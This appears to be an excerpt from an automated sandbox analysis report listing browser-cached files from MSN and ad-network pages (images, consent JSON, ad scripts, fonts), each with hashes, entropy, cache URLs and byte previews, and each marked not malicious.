C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\http___cdn.taboola.com_libtrc_static_thumbnails_4889ff8e9e0bb32b9a7633b2e8e8326a[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	28796
Entropy (8bit):	7.983172352466487
Encrypted:	false
SSDEEP:	768:2kU+er2L5nXGwlWDXbufcftHWQwyoOSaGY2:2jDrm5R4DBfoQwypX2
MD5:	CFB891E6A032CB482BDD59154F3A6714
SHA1:	B25CBE696786E3E15C7FD70E8C88BC7693F9EABA
SHA-256:	DBA8BD1F4A40DC953AF9F1ED7AA5333B2FFE689461B00E812D02D9E20FC3FD5C
SHA-512:	5163D3A41F3DD200F3EBA17B85997F9E639AC185925FE162931A1B757597F339A200B29B94864D9DE26E7534DE5E3C2CD6D0C3B9B88C2AF897062DF3FAC9F5FD
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F4889ff8e9e0bb32b9a7633b2e8e8326a.jpg
Preview:	......JFIF.....................................................................&""&0-0>>T.............................+......+&.%#%.&D5//5DNB>BN_UU_wqw.........7...............6....................................................................7.`.NUn..Jp.vN.... ..h..^U].....Qh`.S0...7m<..m..3.~.<... ./...6 ..U.D.I".H.%A:U;.a5.M.".$..e.9ZVa;O...%k...4.....?-...#VW..y.KR~..4.w...8.[-......29.y.I.\..i...<.<..<..3.4..:E...M...4..s..i..e9.Uh....M....\|.>.R...NU...~....F.-.MD.]..c..g.y2....p;`z...b6..\..Tu...~C.MyNQ<..IDI.a\.!..6.LH.R.g.a.U.8J..3eW;.s!7n.....ZW....X......#Jm.mq..Ju.,..=.&+.b...`sH=.{..}...?).N,N.D......`4..g.`..v6.:)..}=..#..0......;.sOM.S`.R..Z.....M......$Z.V/$.)..;...q..d\].W:f.e.......'.N.i...+..5....W...3........!..#..>..=l.!....k.}..V...9ks^j.<....{e24....L....mLh..E6.H. HIX.....W}}TB....::{d.....u....X..g.......;#UG-5;.7..y..E....G .R....."a.....nm.m...cR..-DY..l.\|P(..\|..p..h.i./mHL..c.L..r.....3.....c.tU[.n.~...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\http___cdn.taboola.com_libtrc_static_thumbnails_79bd3695e59603e4e77cbf141486daa4[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	55265
Entropy (8bit):	7.982078395926199
Encrypted:	false
SSDEEP:	768:c4e2AtqKyhSUSwHSwSTYiEbdhtZgriwrfyj5tsUelnAaUV0Rr/3P2Hxz5Ed7TvMn:FAdGXywbi8ZJwLyamV0Rr2Rmh0IIQS
MD5:	4DC8530633995DAB7E36B0CE0C5388B7
SHA1:	528E87FD8C26822F4F415A516B167E6D8F4325A8
SHA-256:	8F5C751B10E822B252F485156A6BA77B84F8761D54367FF005636C1C3C100894
SHA-512:	19315543BDC56B3385882B273BBB90BFF59E34A1FA1DFFB2067305AC20B35116EB6198711A6054538BBFB11F6F0D38564E768D318A2C46FEDDDCFEA422EDB868
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F79bd3695e59603e4e77cbf141486daa4.png
Preview:	......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T......7...............7....................................................................V..S6....G.n=.z.....].....}.8....K....lQB...Z.f.R]{9..V.2t;.-..e......YZ.....u.....o[@c.Y.5..4.M...=.y7........J/....Yf.2....W`..Y..pn...4..w........u.8...........nE.V=.>m....1..J+....../U.......T\..p...r.9V.....u.<.De..G.......7..\r.mf.70iMLOk..VW.R4......+.......~.p.[.....:....... .]..oAI.y..Z.RX.KD.W.....a.&..v...\~9-BW....3.MgC<H....e....S)...vQY..t(waZQ.X.-c3..Q~...H...6.+.%F....1..0..... .f.g.3...q.Q.n.i../..Mu......B..w^.s..0..s{....Ee].......4..xY..H...""..y{..9.....k..{K.a%.g..dsv.#.A..1..e............~(..?.0..<l..P..'i.!.z.....} .....+hz+>......?.z_g....a...g..j...E. ..jX,1.l........w...Vc.g.0...'..t.q:.p.G.f..A..iE...<.U.og.C..s...z..y..*...W.Ee/iz....g0..;.D.N.......m.....BMBX.\.g..........:8.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\iab2Data[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	180232
Entropy (8bit):	5.115010741936028
Encrypted:	false
SSDEEP:	768:l3JqIWlR2TryukPPnLLuAlGpWAowa8A5NbNQ8nYHv:l3JqIcATDELLxGpEw7Aq8YP
MD5:	EC3D53697497B516D3A5764E2C2D2355
SHA1:	0CDA0F66188EBF363F945341A4F3AA2E6CFE78D3
SHA-256:	2ABD991DABD5977796DB6AE4D44BD600768062D69EE192A4AF2ACB038E13D843
SHA-512:	CC35834574EF3062CCE45792F9755F1FB4B63DDD399A5B44C40555D191411F0B8924E5C2FEFCD08BAC69E1E6D6275E121CABB4A84005288A7452922F94BE5658
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
Preview:	{"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\medianet[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	381584
Entropy (8bit):	5.4849469832715085
Encrypted:	false
SSDEEP:	6144:4D/9Tw5qIZvbBH0m9Z3GCVvgz56Cu1bMsFyvrIW:yIZvdP3GCVvg4xVfFUrIW
MD5:	64665452651F9FC917CFB14E8DB17BCD
SHA1:	116064514391C43D79A80C8BF3621B317152AE4E
SHA-256:	0B42EC2BCC868F35D60E8D8682F609F2BEE99F1F3ED9AF3F9F4B350F0FB63001
SHA-512:	3EE9D4F8F115CD8E4665E8630A9C6F062C1365ABB2BF11197EAE098211974E0DD28F5126B4C2720C3551A168CD6AF843EFC36DEC701BED211D8ED9CACEB48121
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\medianet[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	381583
Entropy (8bit):	5.484938804464865
Encrypted:	false
SSDEEP:	6144:4D/9Tw5qIZvbBH0m9Z3GCVvgz56Cu1bUsFyvrIW:yIZvdP3GCVvg4xVHFUrIW
MD5:	335A7008E62AB7C9E7BA7D3E055EC903
SHA1:	2F336677C63631754D3DE4D326B1F4A752F4E3AD
SHA-256:	1EB910EC7C1044D45065DD986C1A3E11D5D3F330E3532C85E715EAD082CA621B
SHA-512:	099F7CE18B3FBD32B14B8D031F0CECC0E4D81D2457D95BCF64B0903DE0353E62546602609E0522BB1A3F4074A1454786868B84FFBA6466C486BF908AC75AD66D
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\otPcCenter[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	46394
Entropy (8bit):	5.58113620851811
Encrypted:	false
SSDEEP:	384:oj+X+jzgBCL2RAAaRKXWSU8zVrX0eQna41wFpWge0bRApQZInjatWLGuD3eWrwAs:4zgEFAJXWeNeIpW4lzZInuWjlHoQthI
MD5:	145CAF593D1A355E3ECD5450B51B1527
SHA1:	18F98698FC79BA278C4853D0DF2AEE80F61E15A2
SHA-256:	0914915E9870A4ED422DB68057A450DF6923A0FA824B1BE11ACA75C99C2DA9C2
SHA-512:	D02D8D4F9C894ADAB8A0B476D223653F69273B6A8B0476980CD567B7D7C217495401326B14FCBE632DA67C0CB897C158AFCB7125179728A6B679B5F81CADEB59
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/otPcCenter.json
Preview:	.. {.. "name": "otPcCenter",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iIGFyaWEtbW9kYWw9InRydWUiIHJvbGU9ImRpYWxvZyIgYXJpYS1sYWJlbGxlZGJ5PSJvdC1wYy10aXRsZSI+PCEtLSBDbG9zZSBCdXR0b24gLS0+PGRpdiBjbGFzcz0ib3QtcGMtaGVhZGVyIj48IS0tIExvZ28gVGFnIC0tPjxkaXYgY2xhc3M9Im90LXBjLWxvZ28iIHJvbGU9ImltZyIgYXJpYS1sYWJlbD0iQ29tcGFueSBMb2dvIj48L2Rpdj48YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48L2Rpdj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGlkPSJvdC1wYy1jb250ZW50IiBjbGFzcz0ib3QtcGMtc2Nyb2xsYmFyIj48aDMgaWQ9Im90LXBjLXRpdGxlIj5Zb3VyIFByaXZhY3k8L2gzPjxkaXYgaWQ9Im90LXBjLWRlc2MiPjwvZGl2PjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciI+QWxsb3cgYWxsPC9idXR0b24+PHNlY3Rpb24gY2xhc3M9Im90LXNkay1yb3cgb3QtY2F0LWdycCI+PGgzIGlkPSJvdC1jYXRlZ29yeS10aXRsZSI+TWFuYWdlIENvb2tpZSBQcmVmZXJlbmNlczwvaDM+PGRpdiBjbGFzcz0ib3QtcGxpLWhkciI+PHNwYW4gY2xhc3M9Im90LWxpLXRpdGxlIj5Db25zZW50PC9

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\4996b9[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 45633, version 1.0
Category:	downloaded
Size (bytes):	45633
Entropy (8bit):	6.523183274214988
Encrypted:	false
SSDEEP:	768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
MD5:	A92232F513DC07C229DDFA3DE4979FBA
SHA1:	EB6E465AE947709D5215269076F99766B53AE3D1
SHA-256:	F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
SHA-512:	32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Preview:	wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... ............I.A_.<........... ........d........................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AA3e6zI[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	357
Entropy (8bit):	6.88912414461523
Encrypted:	false
SSDEEP:	6:6v/lhPkR/lNisu8luvaWYLlqJJnJq2bTzmNs9SlAT5fqSB6rlgp:6v/78/lNlu8YKq3JJbGNs9SaT5xB6Y
MD5:	272AC060E600BD15C7FA44064B5C150F
SHA1:	27C267507F3A73AAD9E3CA593610633A7E8AF773
SHA-256:	578548F464A640FC0D8C483A1FDC9399436C27391B17572484416492A5485009
SHA-512:	B8CF6622A690DB0A81FE08AE052EC945FD3A1439C3F0A2B85DB113D33EAFD4F08F8B8C9E2C7B69ED623BE24B7AB4290D38FA2B945666DF762D6E672068ED2FB9
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA3e6zI.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...........~.....IDAT8O....0...,@CKCKGI..l..........l@M..,..8<#..$)."..gK.'Y.7q@?p..k......."J...}.y.......(...(.m.a...(.,..".2...\|..g.!P.h....*8.s.>1...@U.`..{`..TUueo...&o..a...4e..[..).i....R..`.......7.......Tv..q...!.7N..U`FP.='.(.qL..}.E.y..1>...H..a.BL.Y:x....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB14EN7h[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	10663
Entropy (8bit):	7.715872615198635
Encrypted:	false
SSDEEP:	192:BpV23EiAqPWo2rhmHI2NF5IZr9Q8yES4+e5B0k9F8OdqmQzMs:7PiAqnHICF5IVVyxk5BB9tdq3Z
MD5:	A1ED4EB0C8FE2739CE3CB55E84DBD10F
SHA1:	7A185F8FF5FF1EC11744B44C8D7F8152F03540D5
SHA-256:	17917B48CF2575A9EA5F845D8221BFBC2BA2C039B2F3916A3842ECF101758CCB
SHA-512:	232AE7AB9D6684CDF47E73FB15B0B87A32628BAEEA97709EA88A24B6594382D1DF957E739E7619EC8E8308D5912C4B896B329940D6947E74DCE7FC75D71C6842
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14EN7h.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...E.(.Y....E.D....=h...<t.S......5i..9.. .:..".R..i...dt&..J..!...P..m&..5`VE..\|..j.d...i..qL=x...4.S@..u.4.J.u.....Ju%.FEU..I.*.]#4.3@.6...yH...=..}.#....bx...1s...O.....7R....."U...........jY.'.L.0..ST.M.:t3...9...2.:.0$...V..A..w..o..T.Y#...=).K..+.....XV...n;......}.37.........:.!E.P.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%-...uE,.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1cGhXz[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	19978
Entropy (8bit):	7.911690209286314
Encrypted:	false
SSDEEP:	384:7EVIuBgySahNmUSL0ojbxHiOmInQkY1G9xqNakhdd:7EV9NhJSLjjb9im5ZqEkhdd
MD5:	112CDED3880A938543418E7E6636D20A
SHA1:	6B56BD2D4593F1CE7C8428CA04FC97D57F5B6FF0
SHA-256:	679B744982208356582DDA92585C5FEC4236D84765706AD00170407A62B21160
SHA-512:	76FD28709443786D16C572FABA7D8850FC4F735C5B263378CEEEC875F6CBA07AA0469847CF95DCE470E653D909AB8A12BF864D7D15D3FC546B68826676C1D3A3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cGhXz.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...R%G.J..-:.i..cTMR.D....Ji).)i)h.......R.Jp. ..(..4.........Hcjko....QT.c...g.f...........=....f........_w.f.F%..c.\w....qQ..q......Ua&W.3.,>.<.....}?.4.d`.....TH.H8.N).'.V .2s.OAV.p..>..>.}>f..N....:.P;..YL.I@..\..oJB.7(..Z2X..0....I.+.....0h.w......$..H....'..:.c.y.S..RE.U......NE2J..IvH..#..E>C.....1..Uc'A..>1...q.....L.ev.,p3..Ca....2I.....N.Zp1..>0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1cV7Ls[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	7293
Entropy (8bit):	7.892224810568486
Encrypted:	false
SSDEEP:	192:BCIZyywK288b+7vZ84YCquoP0T/35eIDV:kgy3IM+7vBhquG0bAIDV
MD5:	30A036032DDEAA280D7E4581EC78BDE7
SHA1:	989D0904429505A6763D7A440AAA2287E7394835
SHA-256:	993A9A34235B758F265F09E6231B899145C0771E59C03BD841CCBED7B662FB71
SHA-512:	ADE6F2B05DF3E8E433CFA86D0EDC15F61A94EB08751FB0645FEDC0B4990C3A18F4142DF695566879530E47A457DC46AA28EF64762E52384DE81D89B2EFAAE8CF
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cV7Ls.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....5...KM..@.....8P..E74.i.p..fiA...Y.Ze....e21...9.,.2......F.i5.Qvc...G....4..D".E8.i4.i..q4.h..M4.i..J1E-....go.I..^[....Q.N..P.LK.g.<......../....B..0'nhlfE..Ve..4.P..K.fis@..K......W.'.P..Pjil.7\|..]...i..5...&....f.s.....L.....Y.&..i5b.Z.Z..E#.....p$-M&.Y.u..Aj.!..f..L....1y..v.t....".B(.....U...v..5H..1.z.t..c.+..'.V=....2.t...%...............W...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1cVE2T[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	8384
Entropy (8bit):	7.917140122906883
Encrypted:	false
SSDEEP:	192:xCvTzijwtXlDOJMCOAujoG9WqQllouK08ZdRuJ4TcLNy:U72jwtXlZCO70GMllouK08Z+6cJy
MD5:	DD93C51936F1100AE1389A9106183B40
SHA1:	200E514E93F5A94F9088F2BC97621F2E49ADE793
SHA-256:	8CCEC3A2A0C6A2DDCBEF4360F70ED801777FEB47B5937B0019C7689C91A61410
SHA-512:	833744E84D2027B2677F0200E40E4F3D19700D3F01346C4E63D5A469FE2A740605E90F1B57FD0486775DAB7AC5CE9F116E8D6A84C86F4A982DA217DC460F8CE4
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cVE2T.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...R.1.YS..N....s.8.R:......\.+...b..k9C...N..k....Sb.].O.FP.[..C..6.....S....SHd...$...~...^9...d.q.@...+.=i..0S...=s..P@'=.i..d......{u.....8..6......H..4.`.0)@.....1@..w.zsB..z.......Z@3n:..)..00id...F.~.a@.n\c..H..$.v....sp2.8.h.....c#....A .....Wi$..j.....P...5< ...4.m@B.5(.E..}1.....dP.\|...nN1Sm..;...m.w.a..7..$.7n'....6..qN.._.R..He.-..N.aP.o.i...1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1cVLqB[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 310x166, frames 3
Category:	downloaded
Size (bytes):	5870
Entropy (8bit):	7.902743739543765
Encrypted:	false
SSDEEP:	96:xGEEfC0Thcax2/0yp9wfO5vKu3wz9X804WEPyHuXpoEbOetfpEYu:xFyThzE/SO5Cu3wpXnC6bQOeZdu
MD5:	0CE768540DBB1C9F6EACC00C44EB7B5D
SHA1:	C6B2C6BE20C8C7023935F48DDDDAB936EF9DBAD3
SHA-256:	1277A1A8C72AE0BBD7BE2D97BE9C615934807DFF8A690462A35D0C196BA6EC50
SHA-512:	4813105275CAB179D9758425E112F8F806E906D0F18259ED6C27D15156D8EA6E68F3984C0B3CA150542A44B80D0CEACAB157D9B5099B13CBC74ED30A11FF483D
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cVLqB.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg&x=318&y=243
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...JQ^..J)1K@.-...R.E0.Z(.AE-..QKE..QM.:.@...,q..]Q}X.W?.?.......={.....uysu!..i$c.......u.c.F..../.......5i.]C#.S..^6>c..Y....w[N......:V...fk....)k...3..k4r....5....L.!%/n....W<..t7U`......".F...A.4..aE.P.E.P.IKE.%....))h.BQKE......J)h...(..R.R.E.-.R. .......Z.JZ(...*9.Hayem..$..b!....&.y.Qz.\N...%,X.......V~....w$.O..#Lt.. ..n..G...8..oH....3.3...h/.`.)...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1cW2y3[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	downloaded
Size (bytes):	2366
Entropy (8bit):	7.821578109027438
Encrypted:	false
SSDEEP:	24:BI/XAo0XxDuLHeOWXG4OZ7DAJuLHenX3f7uHVxSeIHPSyHqlRWxrM/psY/lUwZDy:BGpuERA5Q36ayjepsEGzwvuyZG2S
MD5:	4287E6BF46EA7D0A2A9D07699831ABBE
SHA1:	E2D10899591C342574D8C2D1CEC065AD915805D6
SHA-256:	0D54785FD38C65AD21F4D9C576660AA302F139E40C07463D24F119C374D58FEA
SHA-512:	3A8058C2BFED93094498B66A7572D191F6848DA0163EB9158FB3711705DBC3EBD6C4BCA5384EED3CD6DFFFCAD75AA8B046F7FECBB257CE2B393B5C1B4AD3D3B0
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cW2y3.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
